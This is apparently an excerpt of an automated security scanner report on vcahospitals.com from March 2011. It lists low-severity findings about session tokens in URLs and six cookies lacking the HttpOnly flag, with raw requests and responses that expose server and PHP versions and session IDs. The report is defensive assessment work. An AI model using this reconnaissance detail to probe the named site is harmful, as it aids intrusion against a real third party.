The URL in the request (reproduced in full under Request below) appears to contain a session token within the query string.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c &uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d%252526guid%25253d%252526ipaddress%25253d173.193.21
4.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252
bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:45:40 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 25455 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
5. Cookie without HttpOnly flag set
There are 6 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
5.1. http://www.vcahospitals.com/hanson/appt.html
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.vcahospitals.com
Path:
/hanson/appt.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=v2putd7q3251oms7i32uuk9as6; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hanson/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3dc67ada53800ee9e18d7dea5bca8427db%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&source=hanson&submit=Request+An+Appointment&time1=&time2=&time3=&token=1bdd4ab27a6226797d1c64e72c38d205&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2fapp
t.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d151e7328bb1158b6923d3b2a31a6997c%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26source%3dhanson%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d17a7a579651e8279d22ffcd2910aa757%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252fappt.html%2526source%253dhanson%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%
2526time2%253d%2526time3%253d%2526token%253dc67ada53800ee9e18d7d HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:51:48 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=v2putd7q3251oms7i32uuk9as6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 24905 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
5.2. http://www.vcahospitals.com/hanson/offer.html
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.vcahospitals.com
Path:
/hanson/offer.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526to
ken%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:51:40 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=j1fqeocn1q0uhv2hk1geg4cm22; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19335 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="conte...[SNIP]...
5.3. http://www.vcahospitals.com/main/offer
Summary
Severity: Low
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=3qhitggrmrfo3b1eptve2npsb6; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1 Host: www.vcahospitals.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:03:36 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=3qhitggrmrfo3b1eptve2npsb6; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 10741 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]...
5.4. http://www.vcahospitals.com/main/offer/
Summary
Severity: Low
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/offer/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=9fa7nr5r6l675dmq1d4gnmpmh2; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A6830C2B-D8F4-43F2-B95E-78C277FCCFF2&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d040e6353a7ea37e6930856fe2e96ffd3%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=a7e84c5a5824b2f3bfa388c2289ad10b&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d61B79C48-C062-46F9-ABB6-C9F2C04EB7C7%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d577d155ccfdadada67e9689c8e906f7c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d8EFFB05E-C91A-43DB-BA1B-A7BB745D0BB7%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%252
52fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253d040e6353a7ea37e6930856fe2e96ffd3%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:13:48 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=9fa7nr5r6l675dmq1d4gnmpmh2; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 19716 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]...
5.5. http://www.vcahospitals.com/main/offer/thank-you.html
Summary
Severity: Low
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /main/offer/thank-you.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=mu2hdob1gobie78vsadtqvdr76; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /main/offer/thank-you.html?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=89CA6527-34F5-44F5-9FE6-1408D41DED87&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=0a9f236de16091436621ac3ecb3014ab&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC5E58271-0599-4DCE-A64E-4093BAC4AD11%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d3f9b848b2f0d1b6547ef64f5b4be7af5%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253d552C3BF2-B50A-4487-9212-B5A1CFEBF63B%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de47593670de12e47b4fa1e9df57adad6%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d79086EA1-6374-4E83-A33A-DCBB6D3E16CA%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253db15cfbc2e8b9d5050f6de59c6ed8b5b1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252fof
fer%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com Pragma: no-cache Content-Length: 3685 fname=&lname=&addr=&city=&state=AZ&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=31c82c3543a452dc1200540d59f0157f&guid=0AD96EEC-57E3-4BB0-B188-1922AB63F2B0&referer=&uri=h...[SNIP]...
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:10:55 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=mu2hdob1gobie78vsadtqvdr76; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3161 Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]...
5.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html
Summary
Severity: Low
Confidence: Firm
Host: http://www.vcahospitals.com
Path: /new-york-veterinary-hospital/appt.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=ujbf7feteup2muqgmimolpdqs6; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /new-york-veterinary-hospital/appt.html?altphone=&m1=AM&m2=AM&m3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%2